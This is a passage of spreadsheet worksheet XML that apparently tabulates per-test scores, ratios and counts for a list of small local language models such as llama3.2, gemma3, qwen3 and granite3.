      <c r="E4" s="4" t="s">
        <v>11</v>
      </c>
      <c r="F4" s="3" t="s">
        <v>12</v>
      </c>
      <c r="G4" s="3" t="s">
        <v>11</v>
      </c>
      <c r="H4" s="3" t="s">
        <v>12</v>
      </c>
      <c r="I4" s="3">
        <f t="shared" si="4"/>
        <v>6</v>
      </c>
      <c r="J4" s="5">
        <f t="shared" si="0"/>
        <v>0.2857142857142857</v>
      </c>
      <c r="K4" s="3">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="L4" s="3">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="M4" s="3">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="P4" s="9" t="s">
        <v>15</v>
      </c>
      <c r="Q4" s="11">
        <f>SummaryTable[[#This Row],[Score]]</f>
        <v>6</v>
      </c>
      <c r="R4" t="str">
        <v>llama3.2:1b</v>
      </c>
      <c r="S4">
        <v>5</v>
      </c>
    </row>
    <row r="5" spans="1:19" x14ac:dyDescent="0.3">
      <c r="A5" s="15" t="s">
        <v>188</v>
      </c>
      <c r="B5" s="15" t="s">
        <v>10</v>
      </c>
      <c r="C5" s="15" t="s">
        <v>11</v>
      </c>
      <c r="D5" s="4" t="s">
        <v>12</v>
      </c>
      <c r="E5" s="4" t="s">
        <v>10</v>
      </c>
      <c r="F5" s="15" t="s">
        <v>12</v>
      </c>
      <c r="G5" s="15" t="s">
        <v>10</v>
      </c>
      <c r="H5" s="15" t="s">
        <v>10</v>
      </c>
      <c r="I5" s="15">
        <f t="shared" si="4"/>
        <v>9</v>
      </c>
      <c r="J5" s="5">
        <f t="shared" si="0"/>
        <v>0.5714285714285714</v>
      </c>
      <c r="K5" s="15">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="L5" s="15">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="M5" s="15">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="P5" s="9" t="s">
        <v>188</v>
      </c>
      <c r="Q5" s="11">
        <f>SummaryTable[[#This Row],[Score]]</f>
        <v>9</v>
      </c>
      <c r="R5" t="str">
        <v>gemma3:1b</v>
      </c>
      <c r="S5">
        <v>6</v>
      </c>
    </row>
    <row r="6" spans="1:19" x14ac:dyDescent="0.3">
      <c r="A6" s="3" t="s">
        <v>16</v>
      </c>
      <c r="B6" s="3" t="s">
        <v>10</v>
      </c>
      <c r="C6" s="3" t="s">
        <v>12</v>
      </c>
      <c r="D6" s="4" t="s">
        <v>12</v>
      </c>
      <c r="E6" s="4" t="s">
        <v>10</v>
      </c>
      <c r="F6" s="3" t="s">
        <v>12</v>
      </c>
      <c r="G6" s="3" t="s">
        <v>10</v>
      </c>
      <c r="H6" s="3" t="s">
        <v>10</v>
      </c>
      <c r="I6" s="3">
        <f t="shared" si="4"/>
        <v>8</v>
      </c>
      <c r="J6" s="5">
        <f t="shared" si="0"/>
        <v>0.5714285714285714</v>
      </c>
      <c r="K6" s="3">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="L6" s="3">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="M6" s="3">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="P6" s="9" t="s">
        <v>16</v>
      </c>
      <c r="Q6" s="11">
        <f>SummaryTable[[#This Row],[Score]]</f>
        <v>8</v>
      </c>
      <c r="R6" t="str">
        <v>qwen2.5:3b</v>
      </c>
      <c r="S6">
        <v>6</v>
      </c>
    </row>
    <row r="7" spans="1:19" x14ac:dyDescent="0.3">
      <c r="A7" s="3" t="s">
        <v>17</v>
      </c>
      <c r="B7" s="3" t="s">
        <v>10</v>
      </c>
      <c r="C7" s="3" t="s">
        <v>11</v>
      </c>
      <c r="D7" s="4" t="s">
        <v>12</v>
      </c>
      <c r="E7" s="4" t="s">
        <v>10</v>
      </c>
      <c r="F7" s="3" t="s">
        <v>12</v>
      </c>
      <c r="G7" s="3" t="s">
        <v>11</v>
      </c>
      <c r="H7" s="3" t="s">
        <v>10</v>
      </c>
      <c r="I7" s="3">
        <f t="shared" si="4"/>
        <v>8</v>
      </c>
      <c r="J7" s="5">
        <f t="shared" si="0"/>
        <v>0.42857142857142855</v>
      </c>
      <c r="K7" s="3">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="L7" s="3">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="M7" s="3">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="P7" s="9" t="s">
        <v>17</v>
      </c>
      <c r="Q7" s="11">
        <f>SummaryTable[[#This Row],[Score]]</f>
        <v>8</v>
      </c>
      <c r="R7" t="str">
        <v>qwen3:0.6b</v>
      </c>
      <c r="S7">
        <v>6</v>
      </c>
    </row>
    <row r="8" spans="1:19" x14ac:dyDescent="0.3">
      <c r="A8" s="3" t="s">
        <v>18</v>
      </c>
      <c r="B8" s="3" t="s">
        <v>10</v>
      </c>
      <c r="C8" s="3" t="s">
        <v>11</v>
      </c>
      <c r="D8" s="4" t="s">
        <v>10</v>
      </c>
      <c r="E8" s="4" t="s">
        <v>10</v>
      </c>
      <c r="F8" s="3" t="s">
        <v>10</v>
      </c>
      <c r="G8" s="3" t="s">
        <v>10</v>
      </c>
      <c r="H8" s="3" t="s">
        <v>10</v>
      </c>
      <c r="I8" s="3">
        <f t="shared" si="4"/>
        <v>13</v>
      </c>
      <c r="J8" s="5">
        <f t="shared" si="0"/>
        <v>0.8571428571428571</v>
      </c>
      <c r="K8" s="3">
        <f t="shared" si="1"/>
        <v>6</v>
      </c>
      <c r="L8" s="3">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="M8" s="3">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="P8" s="9" t="s">
        <v>18</v>
      </c>
      <c r="Q8" s="11">
        <f>SummaryTable[[#This Row],[Score]]</f>
        <v>13</v>
      </c>
      <c r="R8" t="str">
        <v>lily_cyber:latest</v>
      </c>
      <c r="S8">
        <v>6</v>
      </c>
    </row>
    <row r="9" spans="1:19" x14ac:dyDescent="0.3">
      <c r="A9" s="3" t="s">
        <v>19</v>
      </c>
      <c r="B9" s="3" t="s">
        <v>10</v>
      </c>
      <c r="C9" s="3" t="s">
        <v>11</v>
      </c>
      <c r="D9" s="4" t="s">
        <v>12</v>
      </c>
      <c r="E9" s="4" t="s">
        <v>10</v>
      </c>
      <c r="F9" s="3" t="s">
        <v>12</v>
      </c>
      <c r="G9" s="3" t="s">
        <v>10</v>
      </c>
      <c r="H9" s="3" t="s">
        <v>11</v>
      </c>
      <c r="I9" s="3">
        <f t="shared" si="4"/>
        <v>8</v>
      </c>
      <c r="J9" s="5">
        <f t="shared" si="0"/>
        <v>0.42857142857142855</v>
      </c>
      <c r="K9" s="3">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="L9" s="3">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="M9" s="3">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="P9" s="9" t="s">
        <v>19</v>
      </c>
      <c r="Q9" s="11">
        <f>SummaryTable[[#This Row],[Score]]</f>
        <v>8</v>
      </c>
      <c r="R9" t="str">
        <v>qwen2.5:1.5b</v>
      </c>
      <c r="S9">
        <v>7</v>
      </c>
    </row>
    <row r="10" spans="1:19" x14ac:dyDescent="0.3">
      <c r="A10" s="3" t="s">
        <v>20</v>
      </c>
      <c r="B10" s="3" t="s">
        <v>10</v>
      </c>
      <c r="C10" s="3" t="s">
        <v>11</v>
      </c>
      <c r="D10" s="4" t="s">
        <v>10</v>
      </c>
      <c r="E10" s="4" t="s">
        <v>10</v>
      </c>
      <c r="F10" s="3" t="s">
        <v>10</v>
      </c>
      <c r="G10" s="3" t="s">
        <v>10</v>
      </c>
      <c r="H10" s="3" t="s">
        <v>10</v>
      </c>
      <c r="I10" s="3">
        <f t="shared" si="4"/>
        <v>13</v>
      </c>
      <c r="J10" s="5">
        <f t="shared" si="0"/>
        <v>0.8571428571428571</v>
      </c>
      <c r="K10" s="3">
        <f t="shared" si="1"/>
        <v>6</v>
      </c>
      <c r="L10" s="3">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="M10" s="3">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="P10" s="9" t="s">
        <v>20</v>
      </c>
      <c r="Q10" s="11">
        <f>SummaryTable[[#This Row],[Score]]</f>
        <v>13</v>
      </c>
      <c r="R10" t="str">
        <v>deepseek-r1:7b</v>
      </c>
      <c r="S10">
        <v>8</v>
      </c>
    </row>
    <row r="11" spans="1:19" x14ac:dyDescent="0.3">
      <c r="A11" s="3" t="s">
        <v>21</v>
      </c>
      <c r="B11" s="3" t="s">
        <v>10</v>
      </c>
      <c r="C11" s="3" t="s">
        <v>12</v>
      </c>
      <c r="D11" s="4" t="s">
        <v>12</v>
      </c>
      <c r="E11" s="4" t="s">
        <v>11</v>
      </c>
      <c r="F11" s="3" t="s">
        <v>12</v>
      </c>
      <c r="G11" s="3" t="s">
        <v>10</v>
      </c>
      <c r="H11" s="3" t="s">
        <v>12</v>
      </c>
      <c r="I11" s="3">
        <f t="shared" si="4"/>
        <v>5</v>
      </c>
      <c r="J11" s="5">
        <f t="shared" si="0"/>
        <v>0.2857142857142857</v>
      </c>
      <c r="K11" s="3">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="L11" s="3">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="M11" s="3">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="P11" s="9" t="s">
        <v>21</v>
      </c>
      <c r="Q11" s="11">
        <f>SummaryTable[[#This Row],[Score]]</f>
        <v>5</v>
      </c>
      <c r="R11" t="str">
        <v>gemma3:4b</v>
      </c>
      <c r="S11">
        <v>8</v>
      </c>
    </row>
    <row r="12" spans="1:19" x14ac:dyDescent="0.3">
      <c r="A12" s="3" t="s">
        <v>22</v>
      </c>
      <c r="B12" s="3" t="s">
        <v>10</v>
      </c>
      <c r="C12" s="3" t="s">
        <v>11</v>
      </c>
      <c r="D12" s="4" t="s">
        <v>11</v>
      </c>
      <c r="E12" s="4" t="s">
        <v>10</v>
      </c>
      <c r="F12" s="3" t="s">
        <v>10</v>
      </c>
      <c r="G12" s="3" t="s">
        <v>10</v>
      </c>
      <c r="H12" s="3" t="s">
        <v>10</v>
      </c>
      <c r="I12" s="3">
        <f t="shared" si="4"/>
        <v>12</v>
      </c>
      <c r="J12" s="5">
        <f t="shared" si="0"/>
        <v>0.7142857142857143</v>
      </c>
      <c r="K12" s="3">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="L12" s="3">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="M12" s="3">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="P12" s="9" t="s">
        <v>22</v>
      </c>
      <c r="Q12" s="11">
        <f>SummaryTable[[#This Row],[Score]]</f>
        <v>12</v>
      </c>
      <c r="R12" t="str">
        <v>granite3-dense:2b</v>
      </c>
      <c r="S12">
        <v>8</v>
      </c>
    </row>
    <row r="13" spans="1:19" x14ac:dyDescent="0.3">
      <c r="A13" s="3" t="s">
        <v>23</v>
      </c>
      <c r="B13" s="3" t="s">
        <v>10</v>
      </c>
      <c r="C13" s="3" t="s">
        <v>11</v>
      </c>
      <c r="D13" s="4" t="s">
        <v>10</v>
      </c>
      <c r="E13" s="4" t="s">
        <v>10</v>
      </c>
      <c r="F13" s="3" t="s">
        <v>12</v>
      </c>
      <c r="G13" s="3" t="s">
        <v>10</v>
      </c>
      <c r="H13" s="3" t="s">
        <v>10</v>
      </c>
      <c r="I13" s="3">
        <f t="shared" si="4"/>
        <v>11</v>
      </c>
      <c r="J13" s="5">
        <f t="shared" si="0"/>
        <v>0.7142857142857143</v>
      </c>
      <c r="K13" s="3">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="L13" s="3">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="M13" s="3">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="P13" s="9" t="s">
        <v>23</v>
      </c>
      <c r="Q13" s="11">
        <f>SummaryTable[[#This Row],[Score]]</f>
        <v>11</v>
      </c>
      <c r="R13" t="str">
        <v>granite3.2:2b</v>
      </c>
      <c r="S13">
        <v>8</v>
      </c>
    </row>
    <row r="14" spans="1:19" x14ac:dyDescent="0.3">
      <c r="A14" s="3" t="s">
        <v>24</v>
      </c>
      <c r="B14" s="3" t="s">
        <v>10</v>
      </c>
      <c r="C14" s="3" t="s">
        <v>11</v>
      </c>
      <c r="D14" s="4" t="s">
        <v>10</v>
      </c>
      <c r="E14" s="4" t="s">
        <v>11</v>
      </c>
      <c r="F14" s="3" t="s">
        <v>10</v>
      </c>
      <c r="G14" s="3" t="s">
        <v>10</v>
      </c>
      <c r="H14" s="3" t="s">
        <v>10</v>
      </c>
      <c r="I14" s="3">
        <f t="shared" si="4"/>
        <v>12</v>
      </c>
      <c r="J14" s="5">
        <f t="shared" si="0"/>
        <v>0.7142857142857143</v>
      </c>
      <c r="K14" s="3">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="L14" s="3">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="M14" s="3">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="P14" s="9" t="s">
        <v>24</v>
      </c>
      <c r="Q14" s="11">
        <f>SummaryTable[[#This Row],[Score]]</f>
        <v>12</v>
      </c>
      <c r="R14" t="str">
        <v>gemma3n:e2b</v>
      </c>
      <c r="S14">
        <v>9</v>
      </c>
    </row>
    <row r="15" spans="1:19" x14ac:dyDescent="0.3">
      <c r="A15" s="3" t="s">
        <v>25</v>
      </c>
      <c r="B15" s="3" t="s">
        <v>10</v>
      </c>
      <c r="C15" s="3" t="s">
        <v>10</v>
      </c>
      <c r="D15" s="4" t="s">
        <v>12</v>
      </c>
      <c r="E15" s="4" t="s">
        <v>11</v>
      </c>
      <c r="F15" s="3" t="s">
        <v>10</v>
      </c>
      <c r="G15" s="3" t="s">
        <v>10</v>
      </c>
      <c r="H15" s="3" t="s">
        <v>10</v>
      </c>
      <c r="I15" s="3">
        <f t="shared" si="4"/>
        <v>11</v>
      </c>
      <c r="J15" s="5">
        <f t="shared" si="0"/>
        <v>0.7142857142857143</v>
      </c>
      <c r="K15" s="3">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="L15" s="3">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="M15" s="3">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="P15" s="9" t="s">
        <v>25</v>
      </c>
      <c r="Q15" s="11">
        <f>SummaryTable[[#This Row],[Score]]</f>
        <v>11</v>
      </c>
      <c r="R15" t="str">
        <v>phi4-mini-reasoning:3.8b</v>
      </c>
      <c r="S15">
        <v>9</v>
      </c>
    </row>
    <row r="16" spans="1:19" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A16" s="3" t="s">
        <v>26</v>
      </c>
      <c r="B16" s="3" t="s">
        <v>10</v>
      </c>
      <c r="C16" s="3" t="s">
        <v>10</v>
      </c>
      <c r="D16" s="4" t="s">
        <v>12</v>
      </c>
      <c r="E16" s="4" t="s">
        <v>11</v>
      </c>
      <c r="F16" s="3" t="s">
        <v>12</v>
      </c>
      <c r="G16" s="3" t="s">
        <v>10</v>
      </c>
      <c r="H16" s="3" t="s">
        <v>10</v>
      </c>
      <c r="I16" s="3">
        <f t="shared" si="4"/>
        <v>9</v>
      </c>
      <c r="J16" s="5">
        <f t="shared" si="0"/>
        <v>0.5714285714285714</v>
      </c>
      <c r="K16" s="3">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="L16" s="3">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="M16" s="3">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="P16" s="9" t="s">
        <v>26</v>
      </c>
      <c r="Q16" s="11">
        <f>SummaryTable[[#This Row],[Score]]</f>
        <v>9</v>
      </c>
      <c r="R16" t="str">
        <v>qwen3:1.7b</v>
      </c>
      <c r="S16">
        <v>10</v>
      </c>
    </row>
    <row r="17" spans="1:19" x14ac:dyDescent="0.3">
      <c r="A17" s="3" t="s">
        <v>27</v>
      </c>
      <c r="B17" s="3" t="s">
        <v>10</v>
      </c>
      <c r="C17" s="15" t="s">
        <v>10</v>
      </c>
      <c r="D17" s="15" t="s">
        <v>11</v>
      </c>
      <c r="E17" s="15" t="s">
        <v>10</v>
      </c>
      <c r="F17" s="15" t="s">
        <v>12</v>
      </c>
      <c r="G17" s="15" t="s">
        <v>10</v>
      </c>
      <c r="H17" s="15" t="s">
        <v>10</v>
      </c>
      <c r="I17" s="3">
        <f t="shared" si="4"/>
        <v>11</v>
      </c>
      <c r="J17" s="5">
        <f t="shared" si="0"/>
        <v>0.7142857142857143</v>
      </c>
      <c r="K17" s="3">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="L17" s="3">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="M17" s="3">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="P17" s="9" t="s">
        <v>27</v>
      </c>
      <c r="Q17" s="11">
        <f>SummaryTable[[#This Row],[Score]]</f>
        <v>11</v>
      </c>
      <c r="R17" t="str">
        <v>llama3:8b</v>
      </c>
      <c r="S17">
        <v>11</v>
      </c>
    </row>
    <row r="18" spans="1:19" x14ac:dyDescent="0.3">
      <c r="A18" s="3" t="s">
        <v>28</v>
      </c>
      <c r="B18" s="3" t="s">
        <v>12</v>
      </c>
      <c r="C18" s="15" t="s">
        <v>11</v>
      </c>
      <c r="D18" s="15" t="s">
        <v>12</v>
      </c>
      <c r="E18" s="15" t="s">
        <v>10</v>
      </c>
      <c r="F18" s="15" t="s">
        <v>12</v>
      </c>
      <c r="G18" s="15" t="s">
        <v>12</v>
      </c>
      <c r="H18" s="15" t="s">
        <v>12</v>
      </c>
      <c r="I18" s="3">
        <f t="shared" si="4"/>
        <v>3</v>
      </c>
      <c r="J18" s="5">
        <f t="shared" si="0"/>
        <v>0.14285714285714285</v>
      </c>
      <c r="K18" s="3">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="L18" s="3">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="M18" s="3">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="P18" s="9" t="s">
        <v>28</v>
      </c>
      <c r="Q18" s="11">
        <f>SummaryTable[[#This Row],[Score]]</f>
        <v>3</v>
      </c>
      <c r="R18" t="str">
        <v>phi3:3.8b</v>
      </c>
      <c r="S18">
        <v>11</v>
      </c>
    </row>
    <row r="19" spans="1:19" x14ac:dyDescent="0.3">
      <c r="A19" s="3" t="s">
        <v>29</v>
      </c>
      <c r="B19" s="3" t="s">
        <v>10</v>
      </c>
      <c r="C19" s="3" t="s">
        <v>12</v>
      </c>
      <c r="D19" s="4" t="s">
        <v>12</v>
      </c>
      <c r="E19" s="4" t="s">
        <v>10</v>
      </c>
      <c r="F19" s="3" t="s">
        <v>12</v>
      </c>
      <c r="G19" s="3" t="s">
        <v>11</v>
      </c>
      <c r="H19" s="3" t="s">
        <v>10</v>
      </c>
      <c r="I19" s="3">
        <f t="shared" si="4"/>
        <v>7</v>
      </c>
      <c r="J19" s="5">
        <f t="shared" si="0"/>
        <v>0.42857142857142855</v>
      </c>
      <c r="K19" s="3">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="L19" s="3">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="M19" s="3">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="P19" s="9" t="s">
        <v>29</v>
      </c>
      <c r="Q19" s="11">
        <f>SummaryTable[[#This Row],[Score]]</f>
        <v>7</v>
      </c>
      <c r="R19" t="str">
        <v>phi4-mini:3.8b</v>
      </c>
      <c r="S19">
        <v>11</v>
      </c>
    </row>
    <row r="20" spans="1:19" x14ac:dyDescent="0.3">
      <c r="A20" s="3" t="s">
        <v>30</v>
      </c>
      <c r="B20" s="3" t="s">
        <v>10</v>
      </c>
      <c r="C20" s="3" t="s">
        <v>12</v>
      </c>
      <c r="D20" s="4" t="s">
        <v>12</v>
      </c>
      <c r="E20" s="4" t="s">
        <v>10</v>
      </c>
      <c r="F20" s="3" t="s">
        <v>12</v>
      </c>
      <c r="G20" s="3" t="s">
        <v>12</v>
      </c>
      <c r="H20" s="3" t="s">
        <v>10</v>
      </c>
      <c r="I20" s="3">
        <f t="shared" si="4"/>
        <v>6</v>
      </c>
      <c r="J20" s="5">
        <f t="shared" si="0"/>
        <v>0.42857142857142855</v>
      </c>
      <c r="K20" s="3">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="L20" s="3">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="M20" s="3">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="P20" s="9" t="s">
        <v>30</v>
      </c>
      <c r="Q20" s="11">
        <f>SummaryTable[[#This Row],[Score]]</f>
        <v>6</v>
      </c>
      <c r="R20" t="str">
        <v>llama3.2:3b</v>
      </c>
      <c r="S20">
        <v>12</v>
      </c>
    </row>
    <row r="21" spans="1:19" x14ac:dyDescent="0.3">
      <c r="A21" s="3" t="s">
        <v>31</v>
      </c>
      <c r="B21" s="3" t="s">
        <v>10</v>
      </c>
      <c r="C21" s="3" t="s">
        <v>12</v>
      </c>
      <c r="D21" s="4" t="s">
        <v>10</v>
      </c>
      <c r="E21" s="4" t="s">
        <v>10</v>
      </c>
      <c r="F21" s="3" t="s">
        <v>10</v>
      </c>
      <c r="G21" s="3" t="s">
        <v>10</v>
      </c>
      <c r="H21" s="3" t="s">
        <v>10</v>
      </c>
      <c r="I21" s="3">
        <f t="shared" si="4"/>
        <v>12</v>
      </c>
      <c r="J21" s="5">
        <f t="shared" si="0"/>
        <v>0.8571428571428571</v>
      </c>
      <c r="K21" s="3">
        <f t="shared" si="1"/>
        <v>6</v>
      </c>
      <c r="L21" s="3">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="M21" s="3">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="P21" s="9" t="s">
        <v>31</v>
      </c>
      <c r="Q21" s="11">
        <f>SummaryTable[[#This Row],[Score]]</f>
        <v>12</v>
      </c>
      <c r="R21" t="str">
        <v>mistral:7b</v>
      </c>
      <c r="S21">
        <v>12</v>
      </c>
    </row>
    <row r="22" spans="1:19" x14ac:dyDescent="0.3">
      <c r="A22" s="3" t="s">
        <v>33</v>
      </c>
      <c r="B22" s="3" t="s">
        <v>10</v>
      </c>
      <c r="C22" s="3" t="s">
        <v>11</v>
      </c>
      <c r="D22" s="4" t="s">
        <v>12</v>
      </c>
      <c r="E22" s="4" t="s">
        <v>12</v>
      </c>
      <c r="F22" s="3" t="s">
        <v>12</v>
      </c>
      <c r="G22" s="3" t="s">
        <v>11</v>
      </c>
      <c r="H22" s="3" t="s">
        <v>10</v>
      </c>
      <c r="I22" s="3">
        <f t="shared" si="4"/>
        <v>6</v>
      </c>
      <c r="J22" s="5">
        <f t="shared" si="0"/>
        <v>0.2857142857142857</v>
      </c>
      <c r="K22" s="3">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="L22" s="3">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="M22" s="3">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="P22" s="9" t="s">
        <v>33</v>
      </c>
      <c r="Q22" s="11">
        <f>SummaryTable[[#This Row],[Score]]</f>
        <v>6</v>
      </c>
      <c r="R22" t="str">
        <v>qwen2.5:7b</v>
      </c>
      <c r="S22">
        <v>12</v>
      </c>
    </row>
    <row r="23" spans="1:19" x14ac:dyDescent="0.3">
      <c r="A23" s="3" t="s">
        <v>34</v>
      </c>
      <c r="B23" s="3" t="s">
        <v>10</v>
      </c>
      <c r="C23" s="3" t="s">
        <v>11</v>
      </c>
      <c r="D23" s="4" t="s">
        <v>12</v>
      </c>
      <c r="E23" s="4" t="s">
        <v>11</v>
      </c>
      <c r="F23" s="3" t="s">
        <v>10</v>
      </c>
      <c r="G23" s="3" t="s">
        <v>10</v>
      </c>
      <c r="H23" s="3" t="s">
        <v>10</v>
      </c>
      <c r="I23" s="3">
        <f t="shared" si="4"/>
        <v>10</v>
      </c>
      <c r="J23" s="5">
        <f t="shared" si="0"/>
        <v>0.5714285714285714</v>
      </c>
      <c r="K23" s="3">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="L23" s="3">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="M23" s="3">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="P23" s="9" t="s">
        <v>34</v>
      </c>
      <c r="Q23" s="11">
        <f>SummaryTable[[#This Row],[Score]]</f>
        <v>10</v>
      </c>
      <c r="R23" t="str">
        <v>granite3-dense:8b</v>
      </c>
      <c r="S23">
        <v>13</v>
      </c>
    </row>
    <row r="24" spans="1:19" x14ac:dyDescent="0.3">
      <c r="A24" s="3" t="s">
        <v>35</v>
      </c>
      <c r="B24" s="3" t="s">
        <v>10</v>
      </c>
      <c r="C24" s="3" t="s">
        <v>10</v>
      </c>
      <c r="D24" s="4" t="s">
        <v>10</v>
      </c>
      <c r="E24" s="4" t="s">
        <v>11</v>
      </c>
      <c r="F24" s="3" t="s">
        <v>10</v>
      </c>
      <c r="G24" s="3" t="s">
        <v>10</v>
      </c>
      <c r="H24" s="3" t="s">
        <v>10</v>
      </c>
      <c r="I24" s="3">
        <f t="shared" si="4"/>
        <v>13</v>
      </c>
      <c r="J24" s="5">
        <f t="shared" si="0"/>
        <v>0.8571428571428571</v>
      </c>
      <c r="K24" s="3">
        <f t="shared" si="1"/>
        <v>6</v>
      </c>
      <c r="L24" s="3">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="M24" s="3">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="P24" s="9" t="s">
        <v>35</v>
      </c>
      <c r="Q24" s="11">
        <f>SummaryTable[[#This Row],[Score]]</f>
        <v>13</v>
      </c>
      <c r="R24" t="str">
        <v>granite3.2:8b</v>
      </c>
      <c r="S24">
        <v>13</v>
      </c>
    </row>
    <row r="25" spans="1:19" x14ac:dyDescent="0.3">
      <c r="A25" s="3" t="s">
        <v>36</v>
      </c>
      <c r="B25" s="3" t="s">
        <v>10</v>
      </c>
      <c r="C25" s="3" t="s">
        <v>10</v>
      </c>
      <c r="D25" s="4" t="s">
        <v>10</v>
      </c>
      <c r="E25" s="4" t="s">
        <v>10</v>
      </c>
      <c r="F25" s="3" t="s">
        <v>10</v>
      </c>
      <c r="G25" s="3" t="s">
        <v>10</v>
      </c>
      <c r="H25" s="3" t="s">
        <v>10</v>
      </c>
      <c r="I25" s="3">
        <f t="shared" si="4"/>
        <v>14</v>
      </c>
      <c r="J25" s="5">
        <f t="shared" si="0"/>
        <v>1</v>
      </c>
      <c r="K25" s="3">
        <f t="shared" si="1"/>
        <v>7</v>
      </c>
      <c r="L25" s="3">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="M25" s="3">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="P25" s="9" t="s">
        <v>36</v>
      </c>
      <c r="Q25" s="11">
        <f>SummaryTable[[#This Row],[Score]]</f>
        <v>14</v>
      </c>
      <c r="R25" t="str">
        <v>qwen3:4b</v>
      </c>
      <c r="S25">
        <v>13</v>
      </c>
    </row>
    <row r="26" spans="1:19" x14ac:dyDescent="0.3">
      <c r="A26" s="3" t="s">
        <v>37</v>
      </c>
      <c r="B26" s="3" t="s">
        <v>10</v>
      </c>
      <c r="C26" s="3" t="s">
        <v>12</v>
      </c>
      <c r="D26" s="4" t="s">
        <v>12</v>
      </c>
      <c r="E26" s="4" t="s">
        <v>12</v>
      </c>
      <c r="F26" s="3" t="s">
        <v>12</v>
      </c>
      <c r="G26" s="3" t="s">
        <v>10</v>
      </c>
      <c r="H26" s="3" t="s">
        <v>10</v>
      </c>
      <c r="I26" s="3">
        <f t="shared" si="4"/>
        <v>6</v>
      </c>
      <c r="J26" s="5">
        <f t="shared" si="0"/>
        <v>0.42857142857142855</v>
      </c>
      <c r="K26" s="3">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="L26" s="3">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="M26" s="3">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
      <c r="P26" s="10" t="s">
        <v>37</v>
      </c>
      <c r="Q26" s="11">
        <f>SummaryTable[[#This Row],[Score]]</f>
        <v>6</v>
      </c>
      <c r="R26" t="str">
        <v>qwen3:8b</v>
      </c>
      <c r="S26">
        <v>14</v>
      </c>
    </row>
    <row r="31" spans="1:19" x14ac:dyDescent="0.3">
      <c r="B31" s="20" t="s">
        <v>203</v>
      </c>
      <c r="C31" s="20"/>
      <c r="D31" s="20"/>
      <c r="E31" s="20"/>
      <c r="F31" s="20"/>
      <c r="G31" s="20"/>
      <c r="H31" s="20"/>
    </row>
    <row r="32" spans="1:19" x14ac:dyDescent="0.3">
      <c r="B32" s="20" t="s">
        <v>204</v>
      </c>
      <c r="C32" s="20"/>
      <c r="D32" s="20"/>
      <c r="E32" s="20"/>
      <c r="F32" s="20"/>
      <c r="G32" s="20"/>
      <c r="H32" s="20"/>
    </row>
  </sheetData>
  <mergeCells count="2">
    <mergeCell ref="B32:H32"/>
    <mergeCell ref="B31:H31"/>
